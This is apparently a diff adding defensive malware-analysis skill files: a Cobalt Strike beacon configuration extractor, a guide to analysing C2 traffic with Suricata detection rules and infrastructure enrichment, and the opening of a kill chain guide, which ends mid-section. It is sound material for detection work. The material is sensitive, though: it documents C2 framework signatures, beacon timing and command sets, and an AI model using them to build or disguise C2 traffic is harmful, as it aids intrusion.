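As a rough sketch of step 3, the function below turns extracted profile values into Suricata rule strings. The profile keys, message text, and SID range are assumptions for illustration; the characters `"`, `;`, `\` and `|` are hex-escaped because Suricata treats them specially inside `content`.

```python
def escape_content(value):
    """Hex-escape characters that are special inside a Suricata content string."""
    return "".join(
        f"|{ord(ch):02X}|" if ch in '";\\|' else ch
        for ch in value
    )


def build_rules(profile, base_sid=1000001):
    """Build one rule per populated profile field."""
    checks = [
        ("user_agent", "http.user_agent", "CS Beacon UA"),
        ("get_uri", "http.uri", "CS Beacon URI"),
    ]
    rules = []
    for index, (field, buffer_name, msg) in enumerate(checks):
        value = profile.get(field)
        if not value:
            continue
        rules.append(
            f'alert http $HOME_NET any -> $EXTERNAL_NET any '
            f'(msg:"{msg}"; flow:established,to_server; '
            f'{buffer_name}; content:"{escape_content(value)}"; '
            f'sid:{base_sid + index}; rev:1;)'
        )
    return rules


profile = {"user_agent": "Mozilla/5.0 (compatible; MSIE 9.0)", "get_uri": "/pixel"}
for rule in build_rules(profile):
    print(rule)
```

Generated rules still need the validation in step 5, because a User-Agent or URI copied from a profile may also match legitimate traffic.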
|
||||
@@ -0,0 +1,337 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Cobalt Strike Beacon Configuration Analyzer
|
||||
|
||||
Extracts and analyzes beacon configurations from PE files, shellcode,
|
||||
and memory dumps using dissect.cobaltstrike and manual parsing.
|
||||
|
||||
Requirements:
|
||||
pip install dissect.cobaltstrike pefile yara-python
|
||||
|
||||
Usage:
|
||||
python process.py --file beacon.exe --output report.json
|
||||
python process.py --file memdump.bin --scan-memory
|
||||
python process.py --directory ./samples --batch
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import struct
|
||||
import sys
|
||||
from collections import defaultdict
|
||||
from datetime import datetime
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
from dissect.cobaltstrike.beacon import BeaconConfig
|
||||
except ImportError:
|
||||
print("ERROR: dissect.cobaltstrike not installed.")
|
||||
print("Run: pip install dissect.cobaltstrike")
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
# TLV field type mapping (setting IDs as used by public parsers such as
# CobaltStrikeParser and dissect.cobaltstrike)
TLV_FIELDS = {
    0x0001: ("BeaconType", "short"),
    0x0002: ("Port", "short"),
    0x0003: ("SleepTime", "int"),
    0x0004: ("MaxGetSize", "int"),
    0x0005: ("Jitter", "short"),
    0x0006: ("MaxDNS", "short"),
    0x0008: ("C2Server", "str"),
    0x0009: ("UserAgent", "str"),
    0x000a: ("PostURI", "str"),
    0x000b: ("Malleable_C2_Instructions", "blob"),
    0x000f: ("PipeName", "str"),
    0x0010: ("Year", "short"),
    0x0011: ("Month", "short"),
    0x0012: ("Day", "short"),
    0x001d: ("SpawnTo_x86", "str"),
    0x001e: ("SpawnTo_x64", "str"),
    0x001f: ("CryptoScheme", "short"),
    0x0020: ("ProxyHostname", "str"),
    0x0021: ("ProxyUsername", "str"),
    0x0022: ("ProxyPassword", "str"),
    0x0025: ("Watermark", "int"),
    0x0036: ("HostHeader", "str"),
}

BEACON_TYPES = {
    0: "HTTP",
    1: "Hybrid HTTP/DNS",
    2: "SMB",
    4: "TCP",
    8: "HTTPS",
    14: "External C2",
    16: "TCP Bind",  # 0x10
}
|
||||
|
||||
|
||||
class BeaconAnalyzer:
|
||||
"""Analyze Cobalt Strike beacon configurations."""
|
||||
|
||||
def __init__(self):
|
||||
self.results = []
|
||||
|
||||
def analyze_file(self, filepath):
|
||||
"""Extract beacon config from a file."""
|
||||
filepath = Path(filepath)
|
||||
if not filepath.exists():
|
||||
print(f"[-] File not found: {filepath}")
|
||||
return None
|
||||
|
||||
print(f"[*] Analyzing: {filepath}")
|
||||
|
||||
# Try dissect.cobaltstrike first
|
||||
result = self._extract_with_dissect(filepath)
|
||||
|
||||
# Fall back to manual extraction
|
||||
if not result:
|
||||
result = self._extract_manual(filepath)
|
||||
|
||||
if result:
|
||||
result["source_file"] = str(filepath)
|
||||
result["analysis_time"] = datetime.now().isoformat()
|
||||
self.results.append(result)
|
||||
|
||||
return result
|
||||
|
||||
    def _extract_with_dissect(self, filepath):
        """Extract config using dissect.cobaltstrike library."""
        try:
            # from_path() returns a single BeaconConfig and raises if no
            # configuration is found, so there is nothing to iterate over
            config = BeaconConfig.from_path(filepath)
            settings = dict(config.settings)

            result = {
                "method": "dissect.cobaltstrike",
                "config": {},
                "indicators": {},
            }

            for key, value in settings.items():
                if value is not None:
                    result["config"][key] = str(value)

            result["indicators"] = self._extract_indicators(settings)
            return result

        except Exception as e:
            print(f" [!] dissect extraction failed: {e}")
            return None
|
||||
|
||||
    def _extract_manual(self, filepath):
        """Manual XOR-based config extraction."""
        try:
            with open(filepath, "rb") as f:
                data = f.read()
        except OSError as e:
            print(f" [!] Read failed: {e}")
            return None

        # The decoded config starts with the BeaconType entry header:
        # type 0x0001, data type 0x0001 (short), length 0x0002
        header = bytes([0x00, 0x01, 0x00, 0x01, 0x00, 0x02])

        for xor_key in [0x2e, 0x69]:
            # Search for XOR'd config start marker
            magic = bytes(b ^ xor_key for b in header)

            offset = data.find(magic)
            if offset == -1:
                continue

            print(f" [+] Config found at 0x{offset:x} (XOR key: 0x{xor_key:02x})")

            config_blob = data[offset:offset + 4096]
            decrypted = bytes(b ^ xor_key for b in config_blob)

            entries = self._parse_tlv(decrypted)
            if entries:
                return {
                    "method": "manual_xor",
                    "xor_key": f"0x{xor_key:02x}",
                    "config_offset": f"0x{offset:x}",
                    "config": entries,
                    "indicators": self._extract_indicators(entries),
                }

        return None
|
||||
|
||||
def _parse_tlv(self, data):
|
||||
"""Parse TLV configuration entries."""
|
||||
entries = {}
|
||||
offset = 0
|
||||
|
||||
while offset + 6 <= len(data):
|
||||
try:
|
||||
entry_type = struct.unpack(">H", data[offset:offset+2])[0]
|
||||
data_type = struct.unpack(">H", data[offset+2:offset+4])[0]
|
||||
entry_len = struct.unpack(">H", data[offset+4:offset+6])[0]
|
||||
except struct.error:
|
||||
break
|
||||
|
||||
if entry_type == 0 or entry_len > 4096:
|
||||
break
|
||||
|
||||
value_data = data[offset+6:offset+6+entry_len]
|
||||
field_info = TLV_FIELDS.get(entry_type)
|
||||
|
||||
if field_info:
|
||||
field_name, expected_type = field_info
|
||||
else:
|
||||
field_name = f"Unknown_0x{entry_type:04x}"
|
||||
expected_type = "blob"
|
||||
|
||||
if data_type == 1 and len(value_data) >= 2:
|
||||
value = struct.unpack(">H", value_data[:2])[0]
|
||||
elif data_type == 2 and len(value_data) >= 4:
|
||||
value = struct.unpack(">I", value_data[:4])[0]
|
||||
elif data_type == 3:
|
||||
value = value_data.rstrip(b'\x00').decode('utf-8', errors='replace')
|
||||
else:
|
||||
value = value_data.hex()
|
||||
|
||||
# Resolve beacon type names
|
||||
if field_name == "BeaconType" and isinstance(value, int):
|
||||
value = BEACON_TYPES.get(value, f"Unknown ({value})")
|
||||
|
||||
entries[field_name] = value
|
||||
offset += 6 + entry_len
|
||||
|
||||
return entries
|
||||
|
||||
def _extract_indicators(self, config):
|
||||
"""Extract IOCs from parsed configuration."""
|
||||
indicators = {
|
||||
"c2_servers": [],
|
||||
"user_agent": "",
|
||||
"named_pipes": [],
|
||||
"spawn_processes": [],
|
||||
"watermark": "",
|
||||
"beacon_type": "",
|
||||
"sleep_time_ms": 0,
|
||||
"jitter_pct": 0,
|
||||
}
|
||||
|
||||
# Handle both dissect dict keys and manual parse keys
|
||||
c2_keys = ["SETTING_DOMAINS", "C2Server"]
|
||||
for key in c2_keys:
|
||||
domains = config.get(key, "")
|
||||
if domains:
|
||||
for d in str(domains).split(","):
|
||||
d = d.strip().rstrip("/")
|
||||
if d:
|
||||
indicators["c2_servers"].append(d)
|
||||
|
||||
ua_keys = ["SETTING_USERAGENT", "UserAgent"]
|
||||
for key in ua_keys:
|
||||
ua = config.get(key, "")
|
||||
if ua:
|
||||
indicators["user_agent"] = str(ua)
|
||||
|
||||
pipe_keys = ["SETTING_PIPENAME", "PipeName"]
|
||||
for key in pipe_keys:
|
||||
pipe = config.get(key, "")
|
||||
if pipe:
|
||||
indicators["named_pipes"].append(str(pipe))
|
||||
|
||||
spawn_keys = [
|
||||
("SETTING_SPAWNTO_X86", "SpawnTo_x86"),
|
||||
("SETTING_SPAWNTO_X64", "SpawnTo_x64"),
|
||||
]
|
||||
for dissect_key, manual_key in spawn_keys:
|
||||
for key in [dissect_key, manual_key]:
|
||||
proc = config.get(key, "")
|
||||
if proc:
|
||||
indicators["spawn_processes"].append(str(proc))
|
||||
|
||||
wm_keys = ["SETTING_WATERMARK", "Watermark"]
|
||||
for key in wm_keys:
|
||||
wm = config.get(key, "")
|
||||
if wm:
|
||||
indicators["watermark"] = str(wm)
|
||||
|
||||
return indicators
|
||||
|
||||
def batch_analyze(self, directory):
|
||||
"""Analyze all files in a directory."""
|
||||
directory = Path(directory)
|
||||
extensions = {".exe", ".dll", ".bin", ".dmp", ".raw"}
|
||||
|
||||
for filepath in directory.rglob("*"):
|
||||
if filepath.suffix.lower() in extensions:
|
||||
self.analyze_file(filepath)
|
||||
|
||||
return self.results
|
||||
|
||||
def cluster_by_watermark(self):
|
||||
"""Cluster analyzed beacons by watermark."""
|
||||
clusters = defaultdict(list)
|
||||
|
||||
for result in self.results:
|
||||
            wm = result.get("indicators", {}).get("watermark") or "unknown"  # empty watermark also maps to "unknown"
|
||||
clusters[wm].append(result.get("source_file", "unknown"))
|
||||
|
||||
return dict(clusters)
|
||||
|
||||
def generate_report(self, output_path=None):
|
||||
"""Generate JSON analysis report."""
|
||||
report = {
|
||||
"analysis_date": datetime.now().isoformat(),
|
||||
"total_beacons": len(self.results),
|
||||
"watermark_clusters": self.cluster_by_watermark(),
|
||||
"all_c2_servers": list(set(
|
||||
server
|
||||
for r in self.results
|
||||
for server in r.get("indicators", {}).get("c2_servers", [])
|
||||
)),
|
||||
"results": self.results,
|
||||
}
|
||||
|
||||
if output_path:
|
||||
with open(output_path, "w") as f:
|
||||
json.dump(report, f, indent=2, default=str)
|
||||
print(f"[+] Report saved to {output_path}")
|
||||
|
||||
return report
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Cobalt Strike Beacon Configuration Analyzer"
|
||||
)
|
||||
parser.add_argument("--file", help="Single file to analyze")
|
||||
parser.add_argument("--directory", help="Directory for batch analysis")
|
||||
parser.add_argument("--output", default="beacon_report.json",
|
||||
help="Output report path")
|
||||
parser.add_argument("--scan-memory", action="store_true",
|
||||
help="Treat input as raw memory dump")
|
||||
parser.add_argument("--batch", action="store_true",
|
||||
help="Batch analyze directory")
|
||||
|
||||
args = parser.parse_args()
|
||||
analyzer = BeaconAnalyzer()
|
||||
|
||||
if args.file:
|
||||
result = analyzer.analyze_file(args.file)
|
||||
if result:
|
||||
print(json.dumps(result, indent=2, default=str))
|
||||
|
||||
elif args.directory and args.batch:
|
||||
results = analyzer.batch_analyze(args.directory)
|
||||
print(f"\n[+] Analyzed {len(results)} beacons")
|
||||
|
||||
else:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
report = analyzer.generate_report(args.output)
|
||||
print(f"\n[+] Total C2 servers found: {len(report['all_c2_servers'])}")
|
||||
for server in report["all_c2_servers"]:
|
||||
print(f" {server}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,387 @@
|
||||
---
|
||||
name: analyzing-command-and-control-communication
|
||||
description: >
|
||||
Analyzes malware command-and-control (C2) communication protocols to understand beacon
|
||||
patterns, command structures, data encoding, and infrastructure. Covers HTTP, HTTPS, DNS,
|
||||
and custom protocol C2 analysis for detection development and threat intelligence.
|
||||
Activates for requests involving C2 analysis, beacon detection, C2 protocol reverse
|
||||
engineering, or command-and-control infrastructure mapping.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, C2, command-and-control, beacon, protocol-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Command-and-Control Communication
|
||||
|
||||
## When to Use
|
||||
|
||||
- Reverse engineering a malware sample has revealed network communication that needs protocol analysis
|
||||
- Building network-level detection signatures for a specific C2 framework (Cobalt Strike, Metasploit, Sliver)
|
||||
- Mapping C2 infrastructure including primary servers, fallback domains, and dead drops
|
||||
- Analyzing encrypted or encoded C2 traffic to understand the command set and data format
|
||||
- Attributing malware to a threat actor based on C2 infrastructure patterns and tooling
|
||||
|
||||
**Do not use** for general network anomaly detection; this is specifically for understanding known or suspected C2 protocols from malware analysis.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- PCAP capture of malware network traffic (from sandbox, network tap, or full packet capture)
|
||||
- Wireshark/tshark for packet-level analysis
|
||||
- Reverse engineering tools (Ghidra, dnSpy) for understanding C2 code in the malware binary
|
||||
- Python 3.8+ with `scapy`, `dpkt`, and `requests` for protocol analysis and replay
|
||||
- Threat intelligence databases for C2 infrastructure correlation (VirusTotal, Shodan, Censys)
|
||||
- JA3/JA3S fingerprint databases for TLS-based C2 identification
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the C2 Channel
|
||||
|
||||
Determine the protocol and transport used for C2 communication:
|
||||
|
||||
```
|
||||
C2 Communication Channels:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
HTTP/HTTPS: Most common; uses standard web traffic to blend in
|
||||
Indicators: Regular POST/GET requests, specific URI patterns, custom headers
|
||||
|
||||
DNS: Tunneling data through DNS queries and responses
|
||||
Indicators: High-volume TXT queries, long subdomain names, high entropy
|
||||
|
||||
Custom TCP/UDP: Proprietary binary protocol on non-standard port
|
||||
Indicators: Non-HTTP traffic on high ports, unknown protocol
|
||||
|
||||
ICMP: Data encoded in ICMP echo/reply payloads
|
||||
Indicators: ICMP packets with large or non-standard payloads
|
||||
|
||||
WebSocket: Persistent bidirectional connection for real-time C2
|
||||
Indicators: WebSocket upgrade followed by binary frames
|
||||
|
||||
Cloud Services: Using legitimate APIs (Telegram, Discord, Slack, GitHub)
|
||||
Indicators: API calls to cloud services from unexpected processes
|
||||
|
||||
Email: SMTP/IMAP for C2 commands and data exfiltration
|
||||
Indicators: Automated email operations from non-email processes
|
||||
```
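
The "high entropy" indicator for DNS tunneling can be approximated with Shannon entropy over the leftmost label of a query name. This is a sketch only: the thresholds (`min_len=20`, `min_entropy=3.5`) and the helper names are assumptions to tune against local traffic, not established cut-offs.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Shannon entropy of a string in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    return -sum(
        (count / total) * math.log2(count / total)
        for count in Counter(text).values()
    )


def looks_like_tunnel(qname, min_len=20, min_entropy=3.5):
    """Flag query names whose first label is both long and high-entropy."""
    label = qname.split(".")[0]
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


for name in ["www.example.com", "a9f3k2l8q0z7x1c5v4b6n2m8.example.com"]:
    print(name, looks_like_tunnel(name))
```

Content delivery and telemetry hostnames can also be long and random-looking, so a check like this works better as a triage filter combined with query volume than as a standalone verdict.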
|
||||
|
||||
### Step 2: Analyze Beacon Pattern
|
||||
|
||||
Characterize the periodic communication pattern:
|
||||
|
||||
```python
|
||||
from scapy.all import rdpcap, IP, TCP
from collections import defaultdict
import statistics

packets = rdpcap("c2_traffic.pcap")

# Group initial TCP SYN packets (SYN set, ACK clear) by destination,
# so SYN-ACK replies are not counted as new connections
connections = defaultdict(list)
for pkt in packets:
    if IP in pkt and TCP in pkt:
        flags = int(pkt[TCP].flags)
        if flags & 0x02 and not flags & 0x10:
            key = f"{pkt[IP].dst}:{pkt[TCP].dport}"
            connections[key].append(float(pkt.time))

# Analyze each destination for beaconing
for dst, times in sorted(connections.items()):
    if len(times) < 3:
        continue

    times.sort()
    intervals = [times[i+1] - times[i] for i in range(len(times)-1)]
    avg_interval = statistics.mean(intervals)
    stdev = statistics.stdev(intervals) if len(intervals) > 1 else 0
    # Coefficient of variation, used here as a rough jitter estimate
    jitter_pct = (stdev / avg_interval * 100) if avg_interval > 0 else 0
    duration = times[-1] - times[0]

    beacon_data = {
        "destination": dst,
        "connections": len(times),
        "duration_seconds": round(duration, 1),
        "avg_interval_seconds": round(avg_interval, 1),
        "stdev_seconds": round(stdev, 1),
        "jitter_percent": round(jitter_pct, 1),
        "is_beacon": 5 < avg_interval < 7200 and jitter_pct < 25,
    }

    if beacon_data["is_beacon"]:
        print(f"[!] BEACON DETECTED: {dst}")
        print(f" Interval: {avg_interval:.0f}s +/- {stdev:.0f}s ({jitter_pct:.0f}% jitter)")
        print(f" Sessions: {len(times)} over {duration:.0f}s")
|
||||
```
|
||||
|
||||
### Step 3: Decode C2 Protocol Structure
|
||||
|
||||
Reverse engineer the message format from captured traffic:
|
||||
|
||||
```python
|
||||
# HTTP-based C2 protocol analysis
import dpkt
import base64

with open("c2_traffic.pcap", "rb") as f:
    pcap = dpkt.pcap.Reader(f)

    for ts, buf in pcap:
        eth = dpkt.ethernet.Ethernet(buf)
        if not isinstance(eth.data, dpkt.ip.IP):
            continue
        ip = eth.data
        if not isinstance(ip.data, dpkt.tcp.TCP):
            continue
        tcp = ip.data

        # Port 443 payloads are normally TLS and only parse as HTTP
        # if the capture was decrypted beforehand
        if tcp.dport in (80, 443) and len(tcp.data) > 0:
            try:
                http = dpkt.http.Request(tcp.data)
            except dpkt.UnpackError:
                continue  # segment is not a complete HTTP request

            print("\n--- C2 REQUEST ---")
            print(f"Method: {http.method}")
            print(f"URI: {http.uri}")
            print(f"Headers: {dict(http.headers)}")
            if http.body:
                print(f"Body ({len(http.body)} bytes):")
                # Try strict Base64 decode; fall back to the raw body
                try:
                    decoded = base64.b64decode(http.body, validate=True)
                    print(f" Decoded: {decoded[:200]}")
                except ValueError:
                    print(f" Raw: {http.body[:200]}")
|
||||
```
|
||||
|
||||
### Step 4: Identify C2 Framework
|
||||
|
||||
Match observed patterns to known C2 frameworks:
|
||||
|
||||
```
|
||||
Known C2 Framework Signatures:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
Cobalt Strike:
|
||||
- Default URIs: /pixel, /submit.php, /___utm.gif, /ca, /dpixel
|
||||
- Malleable C2 profiles customize all traffic characteristics
|
||||
- JA3: varies by profile, catalog at ja3er.com
|
||||
- Watermark in beacon config (unique per license)
|
||||
- Config extraction: use CobaltStrikeParser or 1768.py
|
||||
|
||||
Metasploit/Meterpreter:
|
||||
- Default staging URI patterns: random 4-char checksum
|
||||
- Reverse HTTP(S) handler patterns
|
||||
- Meterpreter TLV (Type-Length-Value) protocol structure
|
||||
|
||||
Sliver:
|
||||
- mTLS, HTTP, DNS, WireGuard transport options
|
||||
- Protobuf-encoded messages
|
||||
- Unique implant ID in communication
|
||||
|
||||
Covenant:
|
||||
- .NET-based C2 framework
|
||||
- HTTP with customizable profiles
|
||||
- Task-based command execution
|
||||
|
||||
PoshC2:
|
||||
- PowerShell/C# based
|
||||
- HTTP with encrypted payloads
|
||||
- Cookie-based session management
|
||||
```
|
||||
|
||||
```bash
|
||||
# Extract Cobalt Strike beacon configuration from a suspect sample
python3 << 'PYEOF'
# Using dissect.cobaltstrike (pip install dissect.cobaltstrike)
from dissect.cobaltstrike.beacon import BeaconConfig

try:
    config = BeaconConfig.from_path("suspect.exe")
    print("Cobalt Strike Beacon Configuration:")
    for key, value in config.settings.items():
        print(f" {key}: {value}")
except Exception as e:
    print(f"Not a Cobalt Strike beacon or parse error: {e}")
PYEOF
|
||||
```
|
||||
|
||||
### Step 5: Map C2 Infrastructure
|
||||
|
||||
Document the full C2 infrastructure and failover mechanisms:
|
||||
|
||||
```python
|
||||
# Infrastructure mapping
import os
import requests

# Read the VirusTotal API key from the environment instead of hard-coding it
VT_API_KEY = os.environ.get("VT_API_KEY", "")

c2_indicators = {
    "primary_c2": "185.220.101.42",
    "domains": ["update.malicious.com", "backup.evil.net"],
    "ports": [443, 8443],
    "failover_dns": ["ns1.malicious-dns.com"],
}

# Enrich with Shodan
def shodan_lookup(ip, api_key):
    resp = requests.get(
        f"https://api.shodan.io/shodan/host/{ip}",
        params={"key": api_key},
        timeout=30,
    )
    if resp.status_code == 200:
        data = resp.json()
        return {
            "ip": ip,
            "ports": data.get("ports", []),
            "os": data.get("os"),
            "org": data.get("org"),
            "asn": data.get("asn"),
            "country": data.get("country_code"),
            "hostnames": data.get("hostnames", []),
            "last_update": data.get("last_update"),
        }
    return None

# Enrich with passive DNS
def pdns_lookup(domain):
    # Using VirusTotal passive DNS
    resp = requests.get(
        f"https://www.virustotal.com/api/v3/domains/{domain}/resolutions",
        headers={"x-apikey": VT_API_KEY},
        timeout=30,
    )
    if resp.status_code == 200:
        data = resp.json()
        resolutions = []
        for r in data.get("data", []):
            resolutions.append({
                "ip": r["attributes"]["ip_address"],
                "date": r["attributes"]["date"],
            })
        return resolutions
    return []
|
||||
```
|
||||
|
||||
### Step 6: Create Network Detection Signatures
|
||||
|
||||
Build detection rules based on analyzed C2 characteristics:
|
||||
|
||||
```bash
|
||||
# Suricata rules for the analyzed C2
# (multi-line rules need a trailing backslash on every continued line)
cat << 'EOF' > c2_detection.rules
# HTTP beacon pattern
alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"MALWARE MalwareX C2 HTTP Beacon"; \
    flow:established,to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/gate.php"; startswith; \
    http.header; content:"User-Agent: Mozilla/5.0 (compatible|3B| MSIE 10.0)"; \
    threshold:type threshold, track by_src, count 5, seconds 600; \
    sid:9000010; rev:1; \
)

# JA3 fingerprint match
alert tls $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"MALWARE MalwareX TLS JA3 Fingerprint"; \
    ja3.hash; content:"a0e9f5d64349fb13191bc781f81f42e1"; \
    sid:9000011; rev:1; \
)

# DNS beacon detection (long alphanumeric subdomain label)
alert dns $HOME_NET any -> any any ( \
    msg:"MALWARE Suspected DNS C2 Tunneling"; \
    dns.query; pcre:"/^[a-z0-9]{20,}\./"; \
    threshold:type threshold, track by_src, count 10, seconds 60; \
    sid:9000012; rev:1; \
)

# Certificate-based detection
alert tls $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"MALWARE MalwareX Self-Signed C2 Certificate"; \
    tls.cert_subject; content:"CN=update.malicious.com"; \
    sid:9000013; rev:1; \
)
EOF
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Beaconing** | Periodic check-in communication from malware to C2 server at regular intervals, often with jitter to avoid pattern detection |
|
||||
| **Jitter** | Randomization applied to beacon interval (e.g., 60s +/- 15%) to make the timing pattern less predictable and harder to detect |
|
||||
| **Malleable C2** | Cobalt Strike feature allowing operators to customize all aspects of C2 traffic (URIs, headers, encoding) to mimic legitimate services |
|
||||
| **Dead Drop** | Intermediate location (paste site, cloud storage, social media) where C2 commands are posted for the malware to retrieve |
|
||||
| **Domain Fronting** | Using a trusted CDN domain in the TLS SNI while routing to a different backend, making C2 traffic appear to go to a legitimate service |
|
||||
| **Fast Flux** | Rapidly changing DNS records for C2 domains to distribute across many IPs and resist takedown efforts |
|
||||
| **C2 Framework** | Software toolkit providing C2 server, implant generator, and operator interface (Cobalt Strike, Metasploit, Sliver, Covenant) |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Wireshark**: Packet analyzer for detailed C2 protocol analysis at the packet level
|
||||
- **RITA (Real Intelligence Threat Analytics)**: Open-source tool analyzing Zeek logs for beacon detection and DNS tunneling
|
||||
- **CobaltStrikeParser**: Tool extracting Cobalt Strike beacon configuration from samples and memory dumps
|
||||
- **JA3/JA3S**: TLS fingerprinting method for identifying C2 frameworks by their TLS implementation characteristics
|
||||
- **Shodan/Censys**: Internet scanning platforms for mapping C2 infrastructure and identifying related servers
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Reverse Engineering a Custom C2 Protocol
|
||||
|
||||
**Context**: A malware sample communicates with its C2 server using an unknown binary protocol over TCP port 8443. The protocol needs to be decoded to understand the command set and build detection signatures.
|
||||
|
||||
**Approach**:
|
||||
1. Filter PCAP for TCP port 8443 conversations and extract the TCP streams
|
||||
2. Analyze the first few exchanges to identify the handshake/authentication mechanism
|
||||
3. Map the message structure (length prefix, type field, payload encoding)
|
||||
4. Cross-reference with Ghidra disassembly of the send/receive functions in the malware
|
||||
5. Identify the command dispatcher and document each command code's function
|
||||
6. Build a protocol decoder in Python for ongoing traffic analysis
|
||||
7. Create Suricata rules matching the protocol handshake or static header bytes
|
||||
|
||||
**Pitfalls**:
|
||||
- Assuming the protocol is static; some C2 frameworks negotiate encryption during the handshake
|
||||
- Not capturing enough traffic to see all command types (some commands are rare)
|
||||
- Missing fallback C2 channels (DNS, ICMP) that activate when the primary channel fails
|
||||
- Confusing encrypted payload data with the protocol framing structure
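Step 6 of the approach can start from a small framing parser. The sketch below assumes a layout like the `[4B length][4B command_id][payload]` format shown in the sample report in this document; the big-endian byte order, the choice that `length` counts payload bytes only, and the name `parse_frames` are illustrative assumptions to be checked against the disassembly.

```python
import struct
from typing import Iterator, Tuple

# Assumed header: big-endian 4-byte length followed by 4-byte command_id.
HEADER = struct.Struct(">II")


def parse_frames(stream: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (command_id, payload) pairs from a reassembled TCP stream."""
    offset = 0
    while offset + HEADER.size <= len(stream):
        length, command_id = HEADER.unpack_from(stream, offset)
        start = offset + HEADER.size
        end = start + length
        if end > len(stream):
            break  # truncated frame: more captured data is needed
        yield command_id, stream[start:end]
        offset = end


if __name__ == "__main__":
    # Two hand-built frames, purely for demonstration.
    demo = HEADER.pack(2, 0x01) + b"\x00\x3c" + HEADER.pack(6, 0x02) + b"whoami"
    for cmd, payload in parse_frames(demo):
        print(f"0x{cmd:02x} {payload!r}")
```

If the payload turns out to be encoded or encrypted, decode it in a separate step after framing so that framing errors and decoding errors stay distinguishable.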
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
C2 COMMUNICATION ANALYSIS REPORT
|
||||
===================================
|
||||
Sample: malware.exe (SHA-256: e3b0c44...)
|
||||
C2 Framework: Cobalt Strike 4.9
|
||||
|
||||
BEACON CONFIGURATION
|
||||
C2 Server: hxxps://185.220.101[.]42/updates
|
||||
Beacon Type: HTTPS (reverse)
|
||||
Sleep: 60 seconds
|
||||
Jitter: 15%
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
|
||||
URI (GET): /dpixel
|
||||
URI (POST): /submit.php
|
||||
Watermark: 1234567890
|
||||
|
||||
PROTOCOL ANALYSIS
|
||||
Transport: HTTPS (TLS 1.2)
|
||||
JA3 Hash: a0e9f5d64349fb13191bc781f81f42e1
|
||||
Certificate: CN=Microsoft Update (self-signed)
|
||||
Encoding: Base64 with XOR key 0x69
|
||||
Command Format: [4B length][4B command_id][payload]
|
||||
|
||||
COMMAND SET
|
||||
0x01 - Sleep Change beacon interval
|
||||
0x02 - Shell Execute cmd.exe command
|
||||
0x03 - Download Transfer file from C2
|
||||
0x04 - Upload Exfiltrate file to C2
|
||||
0x05 - Inject Process injection
|
||||
0x06 - Keylog Start keylogger
|
||||
0x07 - Screenshot Capture screen
|
||||
|
||||
INFRASTRUCTURE
|
||||
Primary: 185.220.101[.]42 (AS12345, Hosting Co, NL)
|
||||
Failover: 91.215.85[.]17 (AS67890, VPS Provider, RU)
|
||||
DNS: update.malicious[.]com -> 185.220.101[.]42
|
||||
Registrar: NameCheap
|
||||
Registration: 2025-09-01
|
||||
|
||||
DETECTION SIGNATURES
|
||||
SID 9000010: HTTP beacon pattern
|
||||
SID 9000011: JA3 TLS fingerprint
|
||||
SID 9000013: C2 certificate match
|
||||
```
|
||||
@@ -0,0 +1,129 @@
|
||||
---
|
||||
name: analyzing-cyber-kill-chain
|
||||
description: >
|
||||
Analyzes intrusion activity against the Lockheed Martin Cyber Kill Chain framework to identify
|
||||
which phases an adversary has completed, where defenses succeeded or failed, and what controls
|
||||
would have interrupted the attack at earlier phases. Use when conducting post-incident analysis,
|
||||
building prevention-focused security controls, or mapping detection gaps to kill chain phases.
|
||||
Activates for requests involving kill chain analysis, intrusion kill chain, attack phase mapping,
|
||||
or Lockheed Martin kill chain framework.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [kill-chain, Lockheed-Martin, MITRE-ATT&CK, intrusion-analysis, defense-in-depth, NIST-CSF]
|
||||
version: 1.0.0
|
||||
author: team-cybersecurity
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Cyber Kill Chain
|
||||
|
||||
## When to Use
|
||||
|
||||
Use this skill when:
|
||||
- Conducting post-incident analysis to determine how far an adversary progressed through an attack sequence
|
||||
- Designing layered defensive controls with the goal of interrupting attacks at the earliest possible phase
|
||||
- Producing threat intelligence reports that communicate attack progression to non-technical stakeholders
|
||||
|
||||
**Do not use** this skill as a standalone framework — combine with MITRE ATT&CK for technique-level granularity beyond what the 7-phase kill chain provides.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Complete incident timeline with forensic artifacts mapped to specific adversary actions
|
||||
- MITRE ATT&CK Enterprise matrix for technique-level mapping within each kill chain phase
|
||||
- Access to threat intelligence on the suspected adversary group's typical kill chain progression
|
||||
- Post-incident report or IR timeline from responding team
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Map Observed Actions to Kill Chain Phases
|
||||
|
||||
The Lockheed Martin Cyber Kill Chain consists of seven phases. Map all observed adversary actions:
|
||||
|
||||
**Phase 1 - Reconnaissance**: Adversary gathers target information before attack.
|
||||
